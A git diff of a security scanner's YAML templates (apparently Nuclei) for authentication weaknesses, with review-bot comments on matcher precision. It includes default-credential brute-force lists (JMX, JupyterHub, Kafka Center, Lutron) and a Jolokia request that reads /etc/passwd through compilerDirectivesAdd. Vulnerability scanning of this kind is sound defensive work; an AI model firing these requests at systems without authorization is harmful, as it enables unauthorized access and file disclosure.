- 123qwe + - root + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'JMImplementation' + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/jolokia-unauthenticated-lfi-8366.yaml b/poc/auth/jolokia-unauthenticated-lfi-8366.yaml new file mode 100644 index 0000000000..ca0f994111 --- /dev/null +++ b/poc/auth/jolokia-unauthenticated-lfi-8366.yaml 
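Review bot: The new `jmx-default-login.yaml` runs `attack: clusterbomb` over two users and seven passwords without `stop-at-first-match: true`, so all fourteen Basic-auth attempts are sent even after one pair is accepted. That is needless load and can trip account lockout on the system being assessed. The matchers (status 200 plus `JMImplementation`) also cannot tell a console that accepts a listed pair from one that serves `/jmx-console/` with no authentication at all, in which case every pair would be reported as a weak credential. Adding `stop-at-first-match: true` to the request and stating that caveat in `description` would make results easier to triage. The numeric passwords (`12345`, `1234`, `123456789`) are unquoted; quoting them, as the IDEMIA template does with `"12345"`, keeps them strings.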
@@ -0,0 +1,31 @@ +id: jolokia-unauthenticated-lfi + +info: + name: Jolokia - Unauthenticated Local File Read + author: dhiyaneshDk + severity: high + description: This exploit allow you to File read with compilerDirectivesAdd + reference: + - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/ + - https://github.com/laluka/jolokia-exploitation-toolkit + tags: jolokia,springboot,tomcat,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd" + - "{{BaseURL}}/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd" + + stop-at-first-match: true + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + - "compilerDirectivesAdd" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/auth/jolokia-unauthenticated-lfi-8364.yaml b/poc/auth/jolokia-unauthenticated-lfi.yaml similarity index 100% rename from poc/auth/jolokia-unauthenticated-lfi-8364.yaml rename to poc/auth/jolokia-unauthenticated-lfi.yaml diff --git a/poc/auth/jupyter-ipython-unauth-8402.yaml b/poc/auth/jupyter-ipython-unauth-8402.yaml deleted file mode 100644 index eb7caae150..0000000000 --- a/poc/auth/jupyter-ipython-unauth-8402.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: jupyter-ipython-unauth -info: - name: Jupyter ipython Unauth - author: pentest_swissky - severity: critical - description: Unauthenticated access to Jupyter instance - tags: unauth -requests: - - method: GET - path: - - "{{BaseURL}}/ipython/tree" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - ipython/static/components - - ipython/kernelspecs - part: body diff --git a/poc/auth/jupyter-ipython-unauth-8405.yaml b/poc/auth/jupyter-ipython-unauth-8405.yaml index 7ea15f99a0..eb7caae150 100644 --- a/poc/auth/jupyter-ipython-unauth-8405.yaml 
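Review bot: The `description` in the new `jolokia-unauthenticated-lfi-8366.yaml` ("This exploit allow you to File read with compilerDirectivesAdd") is ungrammatical and does not say what is exposed. For a `severity: high` finding, wording such as `description: The Jolokia endpoint is reachable without authentication and its DiagnosticCommand compilerDirectivesAdd operation discloses local file content.` is easier to triage. A `remediation:` line (require authentication on the Jolokia endpoint, or disable it) and a `classification` block like the one `jmx-default-login.yaml` gains in this commit would complete the record. The file also ends without a trailing newline.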
+++ b/poc/auth/jupyter-ipython-unauth-8405.yaml @@ -1,21 +1,14 @@ id: jupyter-ipython-unauth - info: - name: Jupyter ipython - Authorization Bypass + name: Jupyter ipython Unauth author: pentest_swissky severity: critical - description: Jupyter was able to be accessed without authentication. - classification: - cvss-score: 10.0 - cvss-metrics: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cwe-id: CWE-288 - tags: unauth,jupyter - + description: Unauthenticated access to Jupyter instance + tags: unauth requests: - method: GET path: - "{{BaseURL}}/ipython/tree" - matchers-condition: and matchers: - type: status @@ -26,5 +19,3 @@ requests: - ipython/static/components - ipython/kernelspecs part: body - -# Enhanced by mp on 2022/05/20 diff --git a/poc/auth/jupyterhub-default-login-8399.yaml b/poc/auth/jupyterhub-default-login-8399.yaml index fbf6bdac5c..52837b9e29 100644 --- a/poc/auth/jupyterhub-default-login-8399.yaml +++ b/poc/auth/jupyterhub-default-login-8399.yaml @@ -1,14 +1,13 @@ id: jupyterhub-default-login - info: name: Jupyterhub Default Login author: For3stCo1d severity: high - reference: https://github.com/jupyterhub/jupyterhub + reference: + - https://github.com/jupyterhub/jupyterhub metadata: shodan-query: http.title:"JupyterHub" tags: jupyterhub,default-login - requests: - raw: - | @@ -17,7 +16,6 @@ requests: Content-Type: application/x-www-form-urlencoded username={{user}}&password={{pass}} - attack: pitchfork payloads: user: @@ -26,7 +24,6 @@ requests: pass: - admin - jupyter - matchers-condition: and matchers: - type: dsl @@ -34,7 +31,6 @@ requests: - contains(tolower(all_headers), 'jupyterhub-session-id=') - contains(tolower(all_headers), 'jupyterhub-hub-login=') condition: and - - type: status status: - - 302 \ No newline at end of file + - 302 diff --git a/poc/auth/jupyterhub-default-login-8400.yaml b/poc/auth/jupyterhub-default-login-8400.yaml deleted file mode 100644 index 8ed406b725..0000000000 
--- a/poc/auth/jupyterhub-default-login-8400.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: jupyterhub-default-login -info: - name: Jupyterhub Default Login - author: For3stCo1d - severity: high - reference: https://github.com/jupyterhub/jupyterhub - metadata: - shodan-query: http.title:"JupyterHub" - tags: jupyterhub,default-login -requests: - - raw: - - | - POST /hub/login?next= HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username={{user}}&password={{pass}} - attack: pitchfork - payloads: - user: - - admin - - jovyan - pass: - - admin - - jupyter - matchers-condition: and - matchers: - - type: dsl - dsl: - - contains(tolower(all_headers), 'jupyterhub-session-id=') - - contains(tolower(all_headers), 'jupyterhub-hub-login=') - condition: and - - type: status - status: - - 302 diff --git a/poc/auth/jwt-token-8408.yaml b/poc/auth/jwt-token-8408.yaml index fe8f403104..55cfb19809 100644 --- a/poc/auth/jwt-token-8408.yaml +++ b/poc/auth/jwt-token-8408.yaml @@ -1,22 +1,15 @@ id: jwt-token - info: name: JWT Token Disclosure author: Ice3man - severity: unknown - metadata: - max-request: 1 - tags: exposure,token,generic - -http: + severity: info + tags: exposure,token +requests: - method: GET path: - "{{BaseURL}}" - extractors: - type: regex part: body regex: - 'eyJ[a-zA-Z0-9]{10,}\.eyJ[a-zA-Z0-9]{10,}\.[a-zA-Z0-9_\-]{10,}' - -# digest: 4b0a004830460221008baff70bdad0aab1fa5268cebae1b9a3689ed519a28b27fea4808128331191ee022100f7261c0a9b531903ab9c3fc69eb93943874995279b02338a89b7624d378d4063:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/jwt-token-8410.yaml b/poc/auth/jwt-token.yaml similarity index 100% rename from poc/auth/jwt-token-8410.yaml rename to poc/auth/jwt-token.yaml diff --git a/poc/auth/kafka-center-default-login-8415.yaml b/poc/auth/kafka-center-default-login-8415.yaml index a7af67b748..6de21b6717 100644 --- a/poc/auth/kafka-center-default-login-8415.yaml +++ b/poc/auth/kafka-center-default-login-8415.yaml 
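Review bot: The extractor regex in `jwt-token-8408.yaml` allows only `[a-zA-Z0-9]` in the first two token segments, but JWT segments are base64url and may contain `-` and `_`, so a token whose header or payload contains either character is not extracted. The third segment already uses the wider class; applying it to all three gives `'eyJ[a-zA-Z0-9_-]{10,}\.eyJ[a-zA-Z0-9_-]{10,}\.[a-zA-Z0-9_-]{10,}'`. The regex line is unchanged context in this hunk, so the gap predates the commit.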
@@ -4,19 +4,19 @@ info: name: Apache Kafka Center Default Login author: dhiyaneshDK severity: high + tags: kafka,default-login description: Apache Kafka Center default admin credentials were discovered. reference: - https://developer.ibm.com/tutorials/kafka-authn-authz/ + metadata: + shodan-query: http.title:"Kafka Center" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - metadata: - max-request: 1 - shodan-query: http.title:"Kafka Center" - tags: kafka,default-login -http: +requests: - raw: - | POST /login/system HTTP/1.1 @@ -34,6 +34,7 @@ http: matchers-condition: and matchers: + - type: word words: - '"code":200' @@ -44,4 +45,4 @@ http: status: - 200 -# digest: 4a0a00473045022100e5dd96ecc7bca7c106e2aaed38555f28cb2c791d1da55d5cdc7d29f9e91de1d2022040f7f445acbf823452128450f6887c94a6a7c312b9b216074e293f6ccfc5bf83:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/kafka-center-default-login.yaml b/poc/auth/kafka-center-default-login.yaml new file mode 100644 index 0000000000..4bf1b45c64 --- /dev/null +++ b/poc/auth/kafka-center-default-login.yaml 
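Review bot: The `cve-id:` key added under `classification` in `kafka-center-default-login-8415.yaml` has no value, so it parses as null and carries no information; an empty classification field may also fail stricter template validation. It is best dropped, since `cwe-id: CWE-522` already follows it. The new `poc/auth/kafka-center-default-login.yaml` added later in this commit has the same empty key. This hunk also moves from `http:` back to `requests:` and removes `max-request: 1`, the opposite direction from the `kafka-center-login.yaml` change in the same commit, so it is worth confirming which form is intended.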
@@ -0,0 +1,42 @@ +id: kafka-center-default-login +info: + name: Apache Kafka Center Default Login + author: dhiyaneshDK + severity: high + tags: kafka,default-login + description: Apache Kafka Center default admin credentials were discovered. + reference: + - https://developer.ibm.com/tutorials/kafka-authn-authz/ + metadata: + shodan-query: http.title:"Kafka Center" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 +requests: + - raw: + - | + POST /login/system HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"name":"{{username}}","password":"{{password}}","checkbox":false} + attack: pitchfork + payloads: + username: + - admin + password: + - admin + matchers-condition: and + matchers: + - type: word + words: + - '"code":200' + - '"name":"admin"' + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/auth/kafka-center-login.yaml b/poc/auth/kafka-center-login.yaml index 62880b87cd..ada0dda642 100644 --- a/poc/auth/kafka-center-login.yaml +++ b/poc/auth/kafka-center-login.yaml @@ -1,18 +1,29 @@ id: kafka-center-login + info: - name: Kafka Center Login + name: Apache Kafka Control Center Login Panel - Detect author: dhiyaneshDK severity: info - tags: panel,kafka + description: Apache Kafka Control Center login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: + max-request: 1 shodan-query: http.title:"Kafka Center" -requests: + tags: panel,kafka + +http: - method: GET path: - '{{BaseURL}}' - redirects: true + + host-redirects: true max-redirects: 2 matchers: - type: word words: - 'Kafka Center' + +# digest: 4b0a00483046022100fa0996e4674e99919c1e2d9188b560e4a27ed0d3d3eb7721b4bb48a8f411e4a0022100b44b057cdf0044851ddf351c111d4739d2d426de0330056b2fcb13cd8f21c250:922c64590222798bb761d5b6d8e72950 
diff --git a/poc/auth/kasm-login-panel.yaml b/poc/auth/kasm-login-panel.yaml new file mode 100644 index 0000000000..a4cbac9b52 --- /dev/null +++ b/poc/auth/kasm-login-panel.yaml @@ -0,0 +1,49 @@ +id: kasm-login-panel + +info: + name: Kasm Login Panel - Detect + author: lum8rjack + severity: info + description: | + Kasm workspaces login panel was detected. + reference: + - https://kasmweb.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + verified: true + max-request: 2 + shodan-query: http.favicon.hash:-2144699833 + tags: panel,kasm,login,detect + +http: + - raw: + - | + GET /#/login HTTP/1.1 + Host: {{Hostname}} + - | + POST /api/login_settings HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"token":null,"username":null} + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Kasm' + - 'content="Kasm Server' + - 'content="Kasm Technologies' + - '"html_title": "Kasm' + condition: or + + - type: status + status: + - 200 + +# digest: 490a004630440220523492c7dff31a0b23100c15e4deb72d437b17b07f22eca391a6070e64a3df89022031430e48b3423ea73a82eaa6d8a8cfe0038661b93922e6be710d8c3d0b79f542:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/keenetic-web-login-8442.yaml b/poc/auth/keenetic-web-login-8442.yaml new file mode 100644 index 0000000000..0d24c5fc72 --- /dev/null +++ b/poc/auth/keenetic-web-login-8442.yaml @@ -0,0 +1,19 @@ +id: keenetic-web-login +info: + name: Keenetic Web Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6817 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/login#goto=%2Fdashboard' + matchers-condition: and + matchers: + - type: word + words: + - 'Keenetic Web' + - type: status + status: + - 200 diff --git a/poc/auth/keenetic-web-login-8443.yaml b/poc/auth/keenetic-web-login-8443.yaml deleted file mode 100644 index bc9aba324b..0000000000 
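Review bot: In the new `kasm-login-panel.yaml`, the body matcher lists the bare word `'Kasm'` next to three longer strings under `condition: or`, and each longer string already contains `Kasm`. The matcher therefore reduces to "a 200 response whose body contains Kasm", so any page that merely mentions the product is reported as a login panel. Removing the `- 'Kasm'` entry leaves the three specific markers to decide. The `classification` block also lacks the `cvss-score: 0` that the other panel templates in this commit carry.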
--- a/poc/auth/keenetic-web-login-8443.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: keenetic-web-login - -info: - name: Keenetic Web Login - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6817 - tags: panel,keenetic - -requests: - - method: GET - path: - - '{{BaseURL}}/login#goto=%2Fdashboard' - - matchers-condition: and - matchers: - - type: word - words: - - 'Keenetic Web' - - type: status - status: - - 200 diff --git a/poc/auth/kenesto-login-8445.yaml b/poc/auth/kenesto-login-8445.yaml index ae45e0681e..8151f43c6f 100644 --- a/poc/auth/kenesto-login-8445.yaml +++ b/poc/auth/kenesto-login-8445.yaml @@ -1,4 +1,5 @@ id: kenesto-login + info: name: Kenesto Login Detect author: pussycat0x @@ -6,10 +7,12 @@ info: metadata: fofa-dork: 'app="kenesto"' tags: login,tech,kenesto + requests: - method: GET path: - "{{BaseURL}}/Kenesto/Account/LogOn?ReturnUrl=%2fkenesto" + matchers-condition: and matchers: - type: word @@ -17,6 +20,7 @@ requests: words: - 'Welcome To Kenesto®' condition: and + - type: status status: - 200 diff --git a/poc/auth/kentico-login-8446.yaml b/poc/auth/kentico-login-8446.yaml deleted file mode 100644 index ed3664810e..0000000000 --- a/poc/auth/kentico-login-8446.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: kentico-login - -info: - name: Kentico Login Panel - author: d4vy - severity: info - reference: https://docs.xperience.io/k8/using-the-kentico-interface - tags: panel,login,kentico - -requests: - - method: GET - path: - - "{{BaseURL}}/CMSPages/logon.aspx" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: dsl - dsl: - - "status_code==200" - - "contains(tolower(body), 'cmspages/getresource.ashx')" - condition: and \ No newline at end of file diff --git a/poc/auth/kentico-login.yaml b/poc/auth/kentico-login.yaml index 9aeddfaad5..5952ac7611 100644 --- a/poc/auth/kentico-login.yaml +++ b/poc/auth/kentico-login.yaml 
@@ -1,16 +1,28 @@ id: kentico-login + info: - name: Kentico Login Panel + name: Kentico Login Panel - Detect author: d4vy severity: info - reference: https://docs.xperience.io/k8/using-the-kentico-interface + description: Kentico login panel was detected. + reference: + - https://docs.xperience.io/k8/using-the-kentico-interface + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 tags: panel,login,kentico -requests: + +http: - method: GET path: - "{{BaseURL}}/CMSPages/logon.aspx" - redirects: true + + host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: dsl @@ -18,3 +30,5 @@ requests: - "status_code==200" - "contains(tolower(body), 'cmspages/getresource.ashx')" condition: and + +# digest: 490a004630440220078d50c830b7aa190132f85b41d021bbfa9afd66faaf56cce243bf8fbbedd6e4022013cf168da3ddebdcb992697741bb9e589b6269951be8c333ede07cc3cd1886d6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/key-cloak-admin-panel.yaml b/poc/auth/key-cloak-admin-panel.yaml index a3d0c21852..26c5d683c8 100644 --- a/poc/auth/key-cloak-admin-panel.yaml +++ b/poc/auth/key-cloak-admin-panel.yaml @@ -1,17 +1,21 @@ id: key-cloak-admin-panel + info: name: Keycloak Admin Panel author: incogbyte,righettod severity: info tags: panel,keycloak + requests: - method: GET path: - "{{BaseURL}}/auth/admin/master/console/" - "{{BaseURL}}/auth/admin" + redirects: true max-redirects: 2 matchers: + - type: word words: - "" diff --git a/poc/auth/keycloak-json-8472.yaml b/poc/auth/keycloak-json-8473.yaml similarity index 100% rename from poc/auth/keycloak-json-8472.yaml rename to poc/auth/keycloak-json-8473.yaml diff --git a/poc/auth/keycloak-json-8474.yaml b/poc/auth/keycloak-json-8474.yaml index 20e0016894..5a557e754a 100644 --- a/poc/auth/keycloak-json-8474.yaml +++ b/poc/auth/keycloak-json-8474.yaml 
@@ -3,11 +3,13 @@ info: name: Keycloak Json File author: oppsec severity: info - tags: exposure + tags: exposure,keycloak,config + requests: - method: GET path: - "{{BaseURL}}/keycloak.json" + matchers-condition: and matchers: - type: word @@ -16,6 +18,7 @@ requests: - resource - auth-server-url condition: and + - type: status status: - 200 diff --git a/poc/auth/keycloak-openid-config-8475.yaml b/poc/auth/keycloak-openid-config-8475.yaml deleted file mode 100644 index 63e6793964..0000000000 --- a/poc/auth/keycloak-openid-config-8475.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: keycloak-openid-config - -info: - name: Keycloak OpenID Configuration - Detect - author: rodnt - severity: info - description: Keycloak Openid configuration information was detected. - reference: - - https://issues.jboss.org/browse/KEYCLOAK-571 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 2 - tags: keycloak,config,exposure - -http: - - method: GET - path: - - "{{BaseURL}}/.well-known/openid-configuration" - - "{{BaseURL}}/auth/realms/master/.well-known/openid-configuration" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'issuer' - - 'authorization_endpoint' - - 'token_endpoint' - - 'userinfo_endpoint' - - 'jwks_uri' - condition: and - -# digest: 4a0a0047304502202046a594d193d1917e5a438527f36b33ee7230c0f035de7c5019809cfa9b2113022100fd74ed3389f1df0bc3eb27dfb579eb6e2d0ed29f38bdb8e69c2de1bcb11523c9:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/keycloak-openid-config.yaml b/poc/auth/keycloak-openid-config.yaml new file mode 100644 index 0000000000..c89a36bcaa --- /dev/null +++ b/poc/auth/keycloak-openid-config.yaml 
@@ -0,0 +1,25 @@ +id: keycloak-openid-config +info: + name: Keycloak openid-config + author: rodnt + severity: info + reference: https://issues.jboss.org/browse/KEYCLOAK-571 + tags: keycloak,config +requests: + - method: GET + path: + - "{{BaseURL}}/.well-known/openid-configuration" + - "{{BaseURL}}/auth/realms/master/.well-known/openid-configuration" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'issuer' + - 'authorization_endpoint' + - 'token_endpoint' + - 'userinfo_endpoint' + - 'jwks_uri' + condition: and diff --git a/poc/auth/keycloak-xss-8481.yaml b/poc/auth/keycloak-xss-8481.yaml index dcd0fb21d4..6e64c100cc 100644 --- a/poc/auth/keycloak-xss-8481.yaml +++ b/poc/auth/keycloak-xss-8481.yaml @@ -2,7 +2,7 @@ id: keycloak-xss info: name: Keycloak <= 8.0 - Cross Site Scripting author: incogbyte - severity: medium + severity: info reference: https://cure53.de/pentest-report_keycloak.pdf tags: keycloak,xss requests: @@ -11,9 +11,6 @@ requests: POST /auth/realms/master/clients-registrations/openid-connect HTTP/1.1 Host: {{Hostname}} Content-Type: application/json - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Content-Type: application/x-www-form-urlencoded {"":1} matchers-condition: and diff --git a/poc/auth/keycloak-xss-8482.yaml b/poc/auth/keycloak-xss-8482.yaml index f6bcb0c4dc..8397f21f07 100644 --- a/poc/auth/keycloak-xss-8482.yaml +++ b/poc/auth/keycloak-xss-8482.yaml @@ -1,11 +1,12 @@ id: keycloak-xss + info: name: Keycloak <= 8.0 - Cross Site Scripting author: incogbyte severity: info - reference: - - https://cure53.de/pentest-report_keycloak.pdf + reference: https://cure53.de/pentest-report_keycloak.pdf tags: keycloak,xss + requests: - raw: - | 
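Review bot: The word matcher in the new `keycloak-openid-config.yaml` checks only fields that any OpenID Connect discovery document contains (`issuer`, `authorization_endpoint`, `token_endpoint`, `userinfo_endpoint`, `jwks_uri`). The first path, `/.well-known/openid-configuration`, is not Keycloak-specific either, so other identity providers would be reported under a Keycloak template id. Adding a product-specific marker to the `and` list, for example `- '/realms/'` (Keycloak issuer URLs normally contain it, but this should be verified against a known instance), would tie the result to the named product. `reference:` is written as a scalar here, while other templates in this commit use the list form.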
@@ -14,11 +15,13 @@ requests: Content-Type: application/json {"":1} + matchers-condition: and matchers: - type: status status: - 400 + - type: word words: - - 'Unrecognized field ""' + - 'Unrecognized field ""' \ No newline at end of file diff --git a/poc/auth/kiwitcms-login-8496.yaml b/poc/auth/kiwitcms-login-8496.yaml index b65a31ddd7..ae81534fc8 100644 --- a/poc/auth/kiwitcms-login-8496.yaml +++ b/poc/auth/kiwitcms-login-8496.yaml @@ -1,26 +1,23 @@ id: kiwitcms-login - info: name: Kiwi TCMS Login author: pdteam severity: info - reference: https://kiwitcms.org - tags: kiwitcms,panel + reference: + - https://kiwitcms.org metadata: shodan-query: title:"Kiwi TCMS - Login",http.favicon.hash:-1909533337 - + tags: kiwitcms,panel requests: - method: GET path: - "{{BaseURL}}/accounts/login/" - matchers: - type: word words: - "Kiwi TCMS" - extractors: - type: regex group: 1 regex: - - "Version ([0-9.]+)" \ No newline at end of file + - "Version ([0-9.]+)" diff --git a/poc/auth/kubernetes-unauth.yaml b/poc/auth/kubernetes-unauth(1).yaml similarity index 100% rename from poc/auth/kubernetes-unauth.yaml rename to poc/auth/kubernetes-unauth(1).yaml diff --git a/poc/auth/lansweeper-login.yaml b/poc/auth/lansweeper-login.yaml index a5e557ec3d..3b230d6f69 100644 --- a/poc/auth/lansweeper-login.yaml +++ b/poc/auth/lansweeper-login.yaml 
@@ -1,41 +1,22 @@ id: lansweeper-login - info: - name: Lansweeper Login Panel - Detect + name: Lansweeper Login author: divya_mudgal severity: info - description: Lansweeper login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - verified: true - max-request: 1 - shodan-query: title:"Lansweeper - Login" tags: lansweeper,tech,panel - -http: +requests: - method: GET path: - "{{BaseURL}}/login.aspx" - - matchers-condition: and + - "{{BaseURL}}/favicon.ico" + stop-at-first-match: true + matchers-condition: or matchers: - type: word name: login words: - "Lansweeper - Login" - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '"\/js\/CustomControls\.js\?([0-9.]+)" type="text\/javascript"' - -# digest: 490a0046304402207d05e439f57066e26a03f20e56f3f2e638ce161e69e6ea4eddbd4f6bb60fc9a6022004e1fc12be3cbefa9f75dcd9fd90c77aaa9be54c74c63568b4eeb29f1581fbfc:922c64590222798bb761d5b6d8e72950 + - type: dsl + name: favicon + dsl: + - "status_code==200 && (\"1847799946\" == mmh3(base64_py(body)))" diff --git a/poc/auth/linksys-wifi-login.yaml b/poc/auth/linksys-wifi-login.yaml index a28ef47206..7aeab4552b 100644 --- a/poc/auth/linksys-wifi-login.yaml +++ b/poc/auth/linksys-wifi-login.yaml 
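Review bot: The new matcher set in `lansweeper-login.yaml` switches to `matchers-condition: or` and removes the status check, so the `login` word matcher now fires on any response that contains `Lansweeper - Login`, including error pages or redirect bodies. Folding the status into the check, e.g. a dsl entry `"status_code==200 && contains(body, 'Lansweeper - Login')"`, would keep the favicon alternative while restoring the previous precision. The hunk also deletes the version extractor, which was the only output telling an asset owner which build is exposed.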
@@ -1,23 +1,36 @@ id: linksys-wifi-login + info: - name: Linksys Smart Wi-Fi + name: Linksys Smart Wi-Fi Login Panel - Detect author: pussycat0x severity: info + description: Linksys Smart Wi-Fi login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: - shodan-dork: http.title:"Linksys Smart WI-FI" + max-request: 1 + shodan-query: http.title:"Linksys Smart WI-FI" tags: tech,panel,linksys,iot -requests: + +http: - method: GET path: - '{{BaseURL}}' - redirects: true + + host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word part: body words: - "Linksys Smart Wi-Fi" + - type: status status: - 200 + +# digest: 4a0a00473045022100862a7d569fe3b14a2e46cd30065583998919758163679e00322517420aac596d02204f989f06bfc28a0b11ee3de99cb284dc0d690a1b346d176cc5538dae96248fb5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/lucee-login-8662.yaml b/poc/auth/lucee-login-8662.yaml index cfd166ca3d..6eb66727ff 100644 --- a/poc/auth/lucee-login-8662.yaml +++ b/poc/auth/lucee-login-8662.yaml @@ -1,15 +1,18 @@ id: lucee-login + info: name: Lucee Web/Server Administrator Login author: dhiyaneshDK severity: info reference: https://www.shodan.io/search?query=http.title%3A%22Lucee%22 tags: panel,lucee + requests: - method: GET path: - '{{BaseURL}}/lucee/admin/web.cfm' - '{{BaseURL}}/lucee/admin/server.cfm' + matchers-condition: and matchers: - type: word diff --git a/poc/auth/lucee-login-8664.yaml b/poc/auth/lucee-login-8664.yaml index 5afa24b148..9b77923363 100644 --- a/poc/auth/lucee-login-8664.yaml +++ b/poc/auth/lucee-login-8664.yaml @@ -3,8 +3,8 @@ info: name: Lucee Web/Server Administrator Login author: dhiyaneshDK severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Lucee%22 + metadata: + shodan-query: http.title:"Lucee" tags: panel,lucee requests: - method: GET 
diff --git a/poc/auth/lucee-login-8665.yaml b/poc/auth/lucee-login-8665.yaml deleted file mode 100644 index 6eb66727ff..0000000000 --- a/poc/auth/lucee-login-8665.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: lucee-login - -info: - name: Lucee Web/Server Administrator Login - author: dhiyaneshDK - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Lucee%22 - tags: panel,lucee - -requests: - - method: GET - path: - - '{{BaseURL}}/lucee/admin/web.cfm' - - '{{BaseURL}}/lucee/admin/server.cfm' - - matchers-condition: and - matchers: - - type: word - words: - - 'Login - Lucee Web Administrator' - - 'Login - Lucee Server Administrator' - - type: status - status: - - 200 diff --git a/poc/auth/lutron-iot-default-login-8675.yaml b/poc/auth/lutron-iot-default-login-8675.yaml new file mode 100644 index 0000000000..aa05f20cc8 --- /dev/null +++ b/poc/auth/lutron-iot-default-login-8675.yaml @@ -0,0 +1,27 @@ +id: lutron-iot-default-login +info: + name: Lutron IOT Device Default Login + author: geeknik + severity: high + reference: + - https://www.lutron.com + tags: iot,default-login,lutron,panel +requests: + - method: GET + path: + - "{{BaseURL}}/login?login=lutron&password=lutron" + matchers-condition: and + matchers: + - type: word + words: + - "LUTRON" + - ">DeviceIP" + - ">Get Database Info as XML" + condition: and + - type: word + part: header + words: + - "text/html" + - type: status + status: + - 200 diff --git a/poc/auth/lutron-iot-default-login-8676.yaml b/poc/auth/lutron-iot-default-login-8676.yaml index 2ec014fb93..9f80864342 100644 --- a/poc/auth/lutron-iot-default-login-8676.yaml +++ b/poc/auth/lutron-iot-default-login-8676.yaml 
@@ -1,13 +1,17 @@ id: lutron-iot-default-login + info: name: Lutron IOT Device Default Login reference: https://www.lutron.com author: geeknik severity: high + tags: iot,default-login,lutron,panel + requests: - method: GET path: - "{{BaseURL}}/login?login=lutron&password=lutron" + matchers-condition: and matchers: - type: word @@ -16,10 +20,12 @@ requests: - ">DeviceIP" - ">Get Database Info as XML" condition: and + - type: word part: header words: - "text/html" + - type: status status: - 200 diff --git a/poc/auth/lutron-iot-default-login-8678.yaml b/poc/auth/lutron-iot-default-login-8678.yaml deleted file mode 100644 index 9f80864342..0000000000 --- a/poc/auth/lutron-iot-default-login-8678.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: lutron-iot-default-login - -info: - name: Lutron IOT Device Default Login - reference: https://www.lutron.com - author: geeknik - severity: high - tags: iot,default-login,lutron,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/login?login=lutron&password=lutron" - - matchers-condition: and - matchers: - - type: word - words: - - "LUTRON" - - ">DeviceIP" - - ">Get Database Info as XML" - condition: and - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 diff --git a/poc/auth/lutron-iot-default-login.yaml b/poc/auth/lutron-iot-default-login.yaml index aa05f20cc8..71fd122838 100644 --- a/poc/auth/lutron-iot-default-login.yaml +++ b/poc/auth/lutron-iot-default-login.yaml @@ -1,15 +1,16 @@ id: lutron-iot-default-login + info: name: Lutron IOT Device Default Login + reference: https://www.lutron.com author: geeknik severity: high - reference: - - https://www.lutron.com - tags: iot,default-login,lutron,panel + requests: - method: GET path: - 